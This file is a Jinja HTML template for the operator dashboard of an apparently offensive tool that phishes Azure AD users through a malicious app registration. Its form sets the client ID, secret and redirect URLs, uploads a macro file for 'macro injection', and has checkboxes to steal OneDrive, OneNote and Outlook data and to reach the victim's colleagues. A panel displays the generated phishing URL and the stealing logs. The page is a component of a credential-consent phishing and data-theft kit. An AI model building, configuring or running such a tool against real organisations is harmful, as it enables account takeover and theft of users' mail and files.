{% extends "layout.html" %}
{% block body %}
<div class="main-panel">
   <div class="content-wrapper">
      <div class="row">
         <div class="col-sm-12  grid-margin ">
            <div class="home-tab">
               <div class="d-sm-flex align-items-center justify-content-between border-bottom">
                  <div id="home-tab" aria-selected="true">
                     <b>Phishing Azure Ad users using App registration</b>
                  </div>
                  <div>
                     <div class="btn-wrapper">
                        {% if status == None or status == "False" %}
                        <a href="{{ url_for('phishingAction', action='runStealer') }}" class="btn btn-primary text-white me-0"><i class="menu-icon mdi mdi-run-fast"></i> Start Phishing</a>
                        {% else %}
                        {% set phishUrl=phishUrl %}
                        <a href="/azure/getcode/{{ uuid }}" target="_blank" class="btn btn-outline-dark"><i class="menu-icon mdi mdi-navigation"></i> Browse</a>
                        <a href="{{ url_for('phishingAction', action='stopStealer') }}" class="btn btn-danger text-white me-0"><i class="menu-icon mdi mdi-stop"></i> Stop Phishing</a>
                        {% endif %}
                     </div>
                  </div>
               </div>
            </div>
         </div>
      </div>
      <div class="row">
         <div class="col-lg-6 d-flex flex-column">
            <div class="row flex-grow">
               <div class="grid-margin stretch-card">
                  <div class="card card-rounded">
                     <div class="card-body">
                        <h4 class="card-title">
                           Phishing configuration
                        </h4>
                        <form method="POST" enctype="multipart/form-data" action="{{url_for('phishing')}}">
                           {{ form.hidden_tag() }}
                           {{ form.clientId.label(class="form-control-label") }}
                           <div class="form-group">
                              {% if form.clientId.errors %}
                              {{ form.clientId(class="form-control is-invalid") }}
                              <div class="invalid-feedback">
                                 {% for error in form.clientId.errors %}
                                 <span>{{ error }}</span>
                                 {% endfor %}
                              </div>
                              {% else %}
                              {{ form.clientId(class="form-control mb-2 mr-sm-2", value=stealerDefault.client_id) }}
                              {% endif %}
                           </div>
                           {{ form.clientSecret.label(class="form-control-label") }}
                           <div class="form-group">
                              {% if form.clientSecret.errors %}
                              {{ form.clientSecret(class="form-control is-invalid") }}
                              <div class="invalid-feedback">
                                 {% for error in form.clientSecret.errors %}
                                 <span>{{ error }}</span>
                                 {% endfor %}
                              </div>
                              {% else %}
                              {{ form.clientSecret(class="form-control mb-2 mr-sm-2", value=stealerDefault.client_secret) }}
                              {% endif %}
                           </div>
                           {{ form.redirectUrl.label(class="form-control-label") }}
                           <div class="form-group">
                              {% if form.redirectUrl.errors %}
                              {{ form.redirectUrl(class="form-control is-invalid") }}
                              <div class="invalid-feedback">
                                 {% for error in form.redirectUrl.errors %}
                                 <span>{{ error }}</span>
                                 {% endfor %}
                              </div>
                              {% else %}
                              {{ form.redirectUrl(class="form-control mb-2 mr-sm-2", value=stealerDefault.redirect_url) }}
                              {% endif %}
                           </div>
                           {{ form.redirectUrlNext.label(class="form-control-label") }}
                           <div class="form-group">
                              {% if form.redirectUrlNext.errors %}
                              {{ form.redirectUrlNext(class="form-control is-invalid") }}
                              <div class="invalid-feedback">
                                 {% for error in form.redirectUrlNext.errors %}
                                 <span>{{ error }}</span>
                                 {% endfor %}
                              </div>
                              {% else %}
                              {{ form.redirectUrlNext(class="form-control mb-2 mr-sm-2", value=stealerDefault.redirect_after_stealing) }}
                              {% endif %}
                           </div>
                           {{ form.macrofile.label(class="form-control-label") }}
                           <div class="form-group">
                              {% if form.macrofile.errors %}
                              {{ form.macrofile(class="form-control is-invalid") }}
                              <div class="invalid-feedback">
                                 {% for error in form.macrofile.errors %}
                                 <span>{{ error }}</span>
                                 {% endfor %}
                              </div>
                              {% else %}
                              {{ form.macrofile(class="file-upload-browse btn btn-primary") }}
                              {% endif %}
                           </div>
                           <div class="form-group">
                              <label class="form-check-label">
                              <input {{stealerDefault.macroInjection}} class="form-check-input" id="macroInjection" name="macroInjection" type="checkbox" value="y">
                              Enable Macors injection
                              </label>
                           </div>
                           <label class="form-control-label">Customize Your Stealing</label>
                           <div class="form-group">
                              <label class="form-check-label">
                              <input {{stealerDefault.stealAll}} class="form-check-input" id="stealAll" name="stealAll" type="checkbox" value="y">
                              Steal All
                              </label>
                              <label class="form-check-label">
                              <input {{stealerDefault.victimsColleague}} class="form-check-input" id="victimsColleague" name="victimsColleague" type="checkbox" value="y">
                              Victims colleague
                              </label>
                              <label class="form-check-label">
                              <input {{stealerDefault.oneDrive}} class="form-check-input" id="oneDrive" name="oneDrive" type="checkbox" value="y">
                              OneDrive
                              </label>
                              <label class="form-check-label">
                              <input {{stealerDefault.oneNote}} class="form-check-input" id="oneNote" name="oneNote" type="checkbox" value="y">
                              OneNote
                              </label>
                              <label class="form-check-label">
                              <input {{stealerDefault.outlook}} class="form-check-input" id="outlook" name="outlook" type="checkbox" value="y">
                              Outlook
                              </label>
                              <label class="form-check-label">
                              <input {{stealerDefault.noStealing}} class="form-check-input" id="noStealing" name="noStealing" type="checkbox" value="y">
                              No Stealing :(
                              </label>
                           </div>
                           {{ form.extension.label(class="form-control-label") }}
                           <div class="form-group">
                              {% if form.extension.errors %}
                              {{ form.extension(class="form-control is-invalid") }}
                              <div class="invalid-feedback">
                                 {% for error in form.extension.errors %}
                                 <span>{{ error }}</span>
                                 {% endfor %}
                              </div>
                              {% else %}
                              {{ form.extension(class="form-control mb-2 mr-sm-2", value=stealerDefault.extension) }}
                              {% endif %}
                           </div>
                           {{ form.delay.label(class="form-control-label") }}
                           <div class="form-group">
                              {% if form.delay.errors %}
                              {{ form.delay(class="form-control is-invalid") }}
                              <div class="invalid-feedback">
                                 {% for error in form.delay.errors %}
                                 <span>{{ error }}</span>
                                 {% endfor %}
                              </div>
                              {% else %}
                              {{ form.delay(class="form-control mb-2 mr-sm-2", value=stealerDefault.delay) }}
                              {% endif %}
                           </div>
                           {{ form.submit(class="btn btn-primary me-2") }}
                           <a href="{{url_for('phishing')}}" class="btn btn-danger">Cancel</a>
                        </form>
                     </div>
                  </div>
               </div>
            </div>
         </div>
         <div class="col-lg-6 d-flex flex-column">
            
               <div class="col-md-6 col-lg-12 grid-margin">
                  <div class="card bg-primary card-rounded">
                     <div class="card-body pb-0">
                        <h4 class="card-title card-title-dash text-white mb-4">Phishing Url</h4>
                        <div class="row">
                           <div class="col-sm-12">
                              {% if phishUrl %}
                              <h4 class="text-info">{{ phishUrl}}</h4>
                              {% else %}
                              <h3 class="text-info">Setup your phishing configuration to get phishing url</h3>
                              {% endif %}
                           </div>
                        </div>
                     </div>
                  </div>
               </div>
               <div class="row flex-grow">
                <div class="col-md-6 col-lg-12 grid-margin stretch-card">
                   <div class="card  bg-dark">
                      <div class="card-body" style="overflow: scroll;position: relative;">
                         <h3 class="card-title text-success">Phishing Logs</h3>
                         <div id="display_log" class="text-warning " style="position: absolute;">
                        {% for log in phishlogs %}
                           {{ log.message | safe }}
                        {% endfor %}
                        </div>
                      </div>
                   </div>
                </div>
            </div>
         </div>
      </div>
   </div>
</div>
</div>
{% endblock %}